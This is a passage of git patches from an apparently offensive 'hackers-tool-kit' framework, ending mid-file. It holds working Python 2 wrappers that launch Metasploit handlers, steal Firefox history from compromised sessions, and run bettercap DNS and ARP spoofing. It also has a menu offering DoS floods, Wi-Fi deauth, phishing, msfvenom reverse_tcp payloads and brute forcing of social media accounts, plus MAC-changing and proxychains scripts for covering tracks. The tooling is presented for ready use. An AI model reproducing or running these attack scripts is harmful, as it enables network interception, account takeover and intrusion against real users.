pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#DNS SPOOF START# +#---------------# +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + + +#-------------# +#DNS SPOOF END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + try: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoofall": + dnsspoofall() + if x == "htk-lite": + os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True + +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 5b1f21d6919c763443ddda1e88c1b3e24c8a4115 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 13:36:03 +0000 Subject: [PATCH 203/214] Add files via upload --- htk-lite/commandinfo/anon.txt | 3 + htk-lite/commandinfo/arpspoof.txt | 3 + htk-lite/commandinfo/aserver.txt | 3 + htk-lite/commandinfo/banner.txt | 3 + htk-lite/commandinfo/clear.txt | 3 + htk-lite/commandinfo/command.txt | 3 + htk-lite/commandinfo/dnsspoof.txt | 5 + htk-lite/commandinfo/dos.txt | 3 + htk-lite/commandinfo/exit.txt | 3 + htk-lite/commandinfo/hashid.txt | 3 + htk-lite/commandinfo/help.txt | 4 + htk-lite/commandinfo/infoscan.txt | 6 + htk-lite/commandinfo/monitor.txt | 3 + htk-lite/commandinfo/netscan.txt | 3 + htk-lite/commandinfo/password.txt | 4 + htk-lite/commandinfo/payload.txt | 4 + htk-lite/commandinfo/reboot.txt | 3 + htk-lite/commandinfo/sysinfo.txt | 3 + htk-lite/commandinfo/terminal.txt | 3 + htk-lite/commandinfo/traff.txt | 3 + htk-lite/commandinfo/verscan.txt | 3 + htk-lite/commandinfo/wordlist.txt | 3 + htk-lite/commandlist/anon-off.py | 53 + htk-lite/commandlist/anon-on.py | 55 + htk-lite/commandlist/arpspoof.py | 51 + htk-lite/commandlist/aserver.py | 56 + htk-lite/commandlist/banner.py | 188 ++ htk-lite/commandlist/clear.py | 2 + htk-lite/commandlist/command.py | 43 + htk-lite/commandlist/dnsspoof-all.py | 52 + htk-lite/commandlist/dnsspoof.py | 53 + htk-lite/commandlist/dos.py | 87 + htk-lite/commandlist/exit.py | 2 + htk-lite/commandlist/hashid.py | 619 ++++++ htk-lite/commandlist/help.py | 69 + htk-lite/commandlist/infoscan-o.py | 176 ++ htk-lite/commandlist/infoscan.py | 117 + htk-lite/commandlist/monitor-off.py | 44 + htk-lite/commandlist/monitor-on.py | 44 + htk-lite/commandlist/netscan.py | 72 + htk-lite/commandlist/password.py | 385 ++++ htk-lite/commandlist/payload.py | 84 + htk-lite/commandlist/reboot.py | 44 + htk-lite/commandlist/sysinfo.py | 66 + htk-lite/commandlist/terminal.py | 43 + htk-lite/commandlist/traff.py | 44 + htk-lite/commandlist/verscan.py | 84 + htk-lite/commandlist/wordlist.py | 44 + .../files/Instagram/Executable/instagram.py | 149 ++ htk-lite/files/Instagram/LICENSE | 21 + htk-lite/files/Instagram/README.md | 124 ++ htk-lite/files/Instagram/accounts.txt | 6 + htk-lite/files/Instagram/database/session.db | Bin 0 -> 12288 bytes htk-lite/files/Instagram/instagram.py | 132 ++ htk-lite/files/Instagram/lib/__init__.py | 2 + .../lib/__pycache__/__init__.cpython-37.pyc | Bin 0 -> 149 bytes .../__pycache__/bad_proxies.cpython-37.pyc | Bin 0 -> 879 bytes .../lib/__pycache__/browser.cpython-37.pyc | Bin 0 -> 3192 bytes .../lib/__pycache__/bruter.cpython-37.pyc | Bin 0 -> 4029 bytes .../lib/__pycache__/const.cpython-37.pyc | Bin 0 -> 3952 bytes .../lib/__pycache__/display.cpython-37.pyc | Bin 0 -> 4167 bytes .../password_manager.cpython-37.pyc | Bin 0 -> 2945 bytes .../lib/__pycache__/proxy.cpython-37.pyc | Bin 0 -> 987 bytes .../lib/__pycache__/proxy_list.cpython-37.pyc | Bin 0 -> 785 bytes .../__pycache__/proxy_manager.cpython-37.pyc | Bin 0 -> 1490 bytes .../lib/__pycache__/scraper.cpython-37.pyc | Bin 0 -> 3557 bytes .../lib/__pycache__/session.cpython-37.pyc | Bin 0 -> 3311 bytes htk-lite/files/Instagram/lib/bad_proxies.py | 24 + htk-lite/files/Instagram/lib/browser.py | 127 ++ htk-lite/files/Instagram/lib/bruter.py | 176 ++ htk-lite/files/Instagram/lib/const.py | 76 + htk-lite/files/Instagram/lib/display.py | 160 ++ .../files/Instagram/lib/password_manager.py | 108 + htk-lite/files/Instagram/lib/proxy.py | 26 + htk-lite/files/Instagram/lib/proxy_list.py | 18 + htk-lite/files/Instagram/lib/proxy_manager.py | 42 + htk-lite/files/Instagram/lib/scraper.py | 123 ++ htk-lite/files/Instagram/lib/session.py | 106 + htk-lite/files/Instagram/requirements.txt | 4 + htk-lite/files/Instagram/test_proxies.py | 138 ++ htk-lite/files/fb-brute.pl | 124 ++ htk-lite/htkl.py | 1899 +++++++++++++++++ htk-lite/htklupdate.py | 4 + htk-lite/install.py | 51 + htk-lite/wordlists/example.txt | 10 + 85 files changed, 6301 insertions(+) create mode 100644 htk-lite/commandinfo/anon.txt create mode 100644 htk-lite/commandinfo/arpspoof.txt create mode 100644 htk-lite/commandinfo/aserver.txt create mode 100644 htk-lite/commandinfo/banner.txt create mode 100644 htk-lite/commandinfo/clear.txt create mode 100644 htk-lite/commandinfo/command.txt create mode 100644 htk-lite/commandinfo/dnsspoof.txt create mode 100644 htk-lite/commandinfo/dos.txt create mode 100644 htk-lite/commandinfo/exit.txt create mode 100644 htk-lite/commandinfo/hashid.txt create mode 100644 htk-lite/commandinfo/help.txt create mode 100644 htk-lite/commandinfo/infoscan.txt create mode 100644 htk-lite/commandinfo/monitor.txt create mode 100644 htk-lite/commandinfo/netscan.txt create mode 100644 htk-lite/commandinfo/password.txt create mode 100644 htk-lite/commandinfo/payload.txt create mode 100644 htk-lite/commandinfo/reboot.txt create mode 100644 htk-lite/commandinfo/sysinfo.txt create mode 100644 htk-lite/commandinfo/terminal.txt create mode 100644 htk-lite/commandinfo/traff.txt create mode 100644 htk-lite/commandinfo/verscan.txt create mode 100644 htk-lite/commandinfo/wordlist.txt create mode 100644 htk-lite/commandlist/anon-off.py create mode 100644 htk-lite/commandlist/anon-on.py create mode 100644 htk-lite/commandlist/arpspoof.py create mode 100644 htk-lite/commandlist/aserver.py create mode 100644 htk-lite/commandlist/banner.py create mode 100644 htk-lite/commandlist/clear.py create mode 100644 htk-lite/commandlist/command.py create mode 100644 htk-lite/commandlist/dnsspoof-all.py create mode 100644 htk-lite/commandlist/dnsspoof.py create mode 100644 htk-lite/commandlist/dos.py create mode 100644 htk-lite/commandlist/exit.py create mode 100644 htk-lite/commandlist/hashid.py create mode 100644 htk-lite/commandlist/help.py create mode 100644 htk-lite/commandlist/infoscan-o.py create mode 100644 htk-lite/commandlist/infoscan.py create mode 100644 htk-lite/commandlist/monitor-off.py create mode 100644 htk-lite/commandlist/monitor-on.py create mode 100644 htk-lite/commandlist/netscan.py create mode 100644 htk-lite/commandlist/password.py create mode 100644 htk-lite/commandlist/payload.py create mode 100644 htk-lite/commandlist/reboot.py create mode 100644 htk-lite/commandlist/sysinfo.py create mode 100644 htk-lite/commandlist/terminal.py create mode 100644 htk-lite/commandlist/traff.py create mode 100644 htk-lite/commandlist/verscan.py create mode 100644 htk-lite/commandlist/wordlist.py create mode 100644 htk-lite/files/Instagram/Executable/instagram.py create mode 100644 htk-lite/files/Instagram/LICENSE create mode 100644 htk-lite/files/Instagram/README.md create mode 100644 htk-lite/files/Instagram/accounts.txt create mode 100644 htk-lite/files/Instagram/database/session.db create mode 100644 htk-lite/files/Instagram/instagram.py create mode 100644 htk-lite/files/Instagram/lib/__init__.py create mode 100644 htk-lite/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/browser.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/bruter.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/const.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/display.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/scraper.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/__pycache__/session.cpython-37.pyc create mode 100644 htk-lite/files/Instagram/lib/bad_proxies.py create mode 100644 htk-lite/files/Instagram/lib/browser.py create mode 100644 htk-lite/files/Instagram/lib/bruter.py create mode 100644 htk-lite/files/Instagram/lib/const.py create mode 100644 htk-lite/files/Instagram/lib/display.py create mode 100644 htk-lite/files/Instagram/lib/password_manager.py create mode 100644 htk-lite/files/Instagram/lib/proxy.py create mode 100644 htk-lite/files/Instagram/lib/proxy_list.py create mode 100644 htk-lite/files/Instagram/lib/proxy_manager.py create mode 100644 htk-lite/files/Instagram/lib/scraper.py create mode 100644 htk-lite/files/Instagram/lib/session.py create mode 100644 htk-lite/files/Instagram/requirements.txt create mode 100644 htk-lite/files/Instagram/test_proxies.py create mode 100644 htk-lite/files/fb-brute.pl create mode 100644 htk-lite/htkl.py create mode 100644 htk-lite/htklupdate.py create mode 100644 htk-lite/install.py create mode 100644 htk-lite/wordlists/example.txt diff --git a/htk-lite/commandinfo/anon.txt b/htk-lite/commandinfo/anon.txt new file mode 100644 index 0000000..81d40ed --- /dev/null +++ b/htk-lite/commandinfo/anon.txt @@ -0,0 +1,3 @@ +ANON: + +make yourself anonymous with proxychains and macchanger diff --git a/htk-lite/commandinfo/arpspoof.txt b/htk-lite/commandinfo/arpspoof.txt new file mode 100644 index 0000000..3e60da0 --- /dev/null +++ b/htk-lite/commandinfo/arpspoof.txt @@ -0,0 +1,3 @@ +ARPSPOOF: + +spoof ARP packages on a specific target or targets diff --git a/htk-lite/commandinfo/aserver.txt b/htk-lite/commandinfo/aserver.txt new file mode 100644 index 0000000..96084c9 --- /dev/null +++ b/htk-lite/commandinfo/aserver.txt @@ -0,0 +1,3 @@ +ASERVER: + +start a apache server on your local host and open it up on a browser diff --git a/htk-lite/commandinfo/banner.txt b/htk-lite/commandinfo/banner.txt new file mode 100644 index 0000000..f9acfe5 --- /dev/null +++ b/htk-lite/commandinfo/banner.txt @@ -0,0 +1,3 @@ +BANNER: + +prints out a random banner out of the 6 banners available diff --git a/htk-lite/commandinfo/clear.txt b/htk-lite/commandinfo/clear.txt new file mode 100644 index 0000000..1552dcb --- /dev/null +++ b/htk-lite/commandinfo/clear.txt @@ -0,0 +1,3 @@ +CLEAR: + +clears the screen diff --git a/htk-lite/commandinfo/command.txt b/htk-lite/commandinfo/command.txt new file mode 100644 index 0000000..883b398 --- /dev/null +++ b/htk-lite/commandinfo/command.txt @@ -0,0 +1,3 @@ +COMMAND: + +runs a terminal command from the framework diff --git a/htk-lite/commandinfo/dnsspoof.txt b/htk-lite/commandinfo/dnsspoof.txt new file mode 100644 index 0000000..8e10b68 --- /dev/null +++ b/htk-lite/commandinfo/dnsspoof.txt @@ -0,0 +1,5 @@ +DNSSPOOF: + +Start DNS Spoofing with bettercap to +dns spoof the whole subnet instead of +selecting a target type [dnsspoof --all] diff --git a/htk-lite/commandinfo/dos.txt b/htk-lite/commandinfo/dos.txt new file mode 100644 index 0000000..943fb6d --- /dev/null +++ b/htk-lite/commandinfo/dos.txt @@ -0,0 +1,3 @@ +DOS: + +runs Denial-Of-Service attacks with udp, syn, tcp, etc diff --git a/htk-lite/commandinfo/exit.txt b/htk-lite/commandinfo/exit.txt new file mode 100644 index 0000000..d25bd63 --- /dev/null +++ b/htk-lite/commandinfo/exit.txt @@ -0,0 +1,3 @@ +EXIT: + +exits htk-lite diff --git a/htk-lite/commandinfo/hashid.txt b/htk-lite/commandinfo/hashid.txt new file mode 100644 index 0000000..8ec7254 --- /dev/null +++ b/htk-lite/commandinfo/hashid.txt @@ -0,0 +1,3 @@ +HASHID: + +find out what type of hash a hash is diff --git a/htk-lite/commandinfo/help.txt b/htk-lite/commandinfo/help.txt new file mode 100644 index 0000000..fb3c22c --- /dev/null +++ b/htk-lite/commandinfo/help.txt @@ -0,0 +1,4 @@ +HELP: + +will print out all the commands you can use in the framework +with a cool banner diff --git a/htk-lite/commandinfo/infoscan.txt b/htk-lite/commandinfo/infoscan.txt new file mode 100644 index 0000000..0affe77 --- /dev/null +++ b/htk-lite/commandinfo/infoscan.txt @@ -0,0 +1,6 @@ +INFOSCAN: + +the infoscan command will try to get a bunch +of information from a host like whois, dnslookup, cloudflare, etc +if you type 'infoscan -o' in the framework you can +run a specific scan if you only want to do one of them diff --git a/htk-lite/commandinfo/monitor.txt b/htk-lite/commandinfo/monitor.txt new file mode 100644 index 0000000..5f113a6 --- /dev/null +++ b/htk-lite/commandinfo/monitor.txt @@ -0,0 +1,3 @@ +MONITOR: + +turn monitor mode on and off with airmon-ng diff --git a/htk-lite/commandinfo/netscan.txt b/htk-lite/commandinfo/netscan.txt new file mode 100644 index 0000000..83719fa --- /dev/null +++ b/htk-lite/commandinfo/netscan.txt @@ -0,0 +1,3 @@ +NETSCAN: + +scan for information about your network devices, mac addresses, etc diff --git a/htk-lite/commandinfo/password.txt b/htk-lite/commandinfo/password.txt new file mode 100644 index 0000000..494997c --- /dev/null +++ b/htk-lite/commandinfo/password.txt @@ -0,0 +1,4 @@ +PASSWORD: + +crack passwords for social media, wifi, services like ssh, ftp, etc +using dictionary attacks (require wordlists) diff --git a/htk-lite/commandinfo/payload.txt b/htk-lite/commandinfo/payload.txt new file mode 100644 index 0000000..76d0e58 --- /dev/null +++ b/htk-lite/commandinfo/payload.txt @@ -0,0 +1,4 @@ +PAYLOAD: + +makes a payload with msfvenom these payloads are mostly +reverse_tcp diff --git a/htk-lite/commandinfo/reboot.txt b/htk-lite/commandinfo/reboot.txt new file mode 100644 index 0000000..620b5f9 --- /dev/null +++ b/htk-lite/commandinfo/reboot.txt @@ -0,0 +1,3 @@ +REBOOT: + +reboots the htk-lite script diff --git a/htk-lite/commandinfo/sysinfo.txt b/htk-lite/commandinfo/sysinfo.txt new file mode 100644 index 0000000..3e72f52 --- /dev/null +++ b/htk-lite/commandinfo/sysinfo.txt @@ -0,0 +1,3 @@ +SYSINFO: + +shows information about your device uname, public ip, os, etc diff --git a/htk-lite/commandinfo/terminal.txt b/htk-lite/commandinfo/terminal.txt new file mode 100644 index 0000000..16a7dc6 --- /dev/null +++ b/htk-lite/commandinfo/terminal.txt @@ -0,0 +1,3 @@ +TERMINAL: + +open a new terminal window diff --git a/htk-lite/commandinfo/traff.txt b/htk-lite/commandinfo/traff.txt new file mode 100644 index 0000000..26b59f5 --- /dev/null +++ b/htk-lite/commandinfo/traff.txt @@ -0,0 +1,3 @@ +TRAFF: + +shows internet traffic packages diff --git a/htk-lite/commandinfo/verscan.txt b/htk-lite/commandinfo/verscan.txt new file mode 100644 index 0000000..1483705 --- /dev/null +++ b/htk-lite/commandinfo/verscan.txt @@ -0,0 +1,3 @@ +VERSCAN: + +scan services for their version diff --git a/htk-lite/commandinfo/wordlist.txt b/htk-lite/commandinfo/wordlist.txt new file mode 100644 index 0000000..98f470f --- /dev/null +++ b/htk-lite/commandinfo/wordlist.txt @@ -0,0 +1,3 @@ +WORDLIST: + +make wordlists with cupp for dictionary attacks diff --git a/htk-lite/commandlist/anon-off.py b/htk-lite/commandlist/anon-off.py new file mode 100644 index 0000000..8bd0f89 --- /dev/null +++ b/htk-lite/commandlist/anon-off.py @@ -0,0 +1,53 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() +anonoff() diff --git a/htk-lite/commandlist/anon-on.py b/htk-lite/commandlist/anon-on.py new file mode 100644 index 0000000..1c34acb --- /dev/null +++ b/htk-lite/commandlist/anon-on.py @@ -0,0 +1,55 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python htkl.py --quickrun') + +anonon() diff --git a/htk-lite/commandlist/arpspoof.py b/htk-lite/commandlist/arpspoof.py new file mode 100644 index 0000000..d5c7f76 --- /dev/null +++ b/htk-lite/commandlist/arpspoof.py @@ -0,0 +1,51 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("\033[1mTarget/s:\033[0m ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") + +arpspoof() diff --git a/htk-lite/commandlist/aserver.py b/htk-lite/commandlist/aserver.py new file mode 100644 index 0000000..8d17da0 --- /dev/null +++ b/htk-lite/commandlist/aserver.py @@ -0,0 +1,56 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ 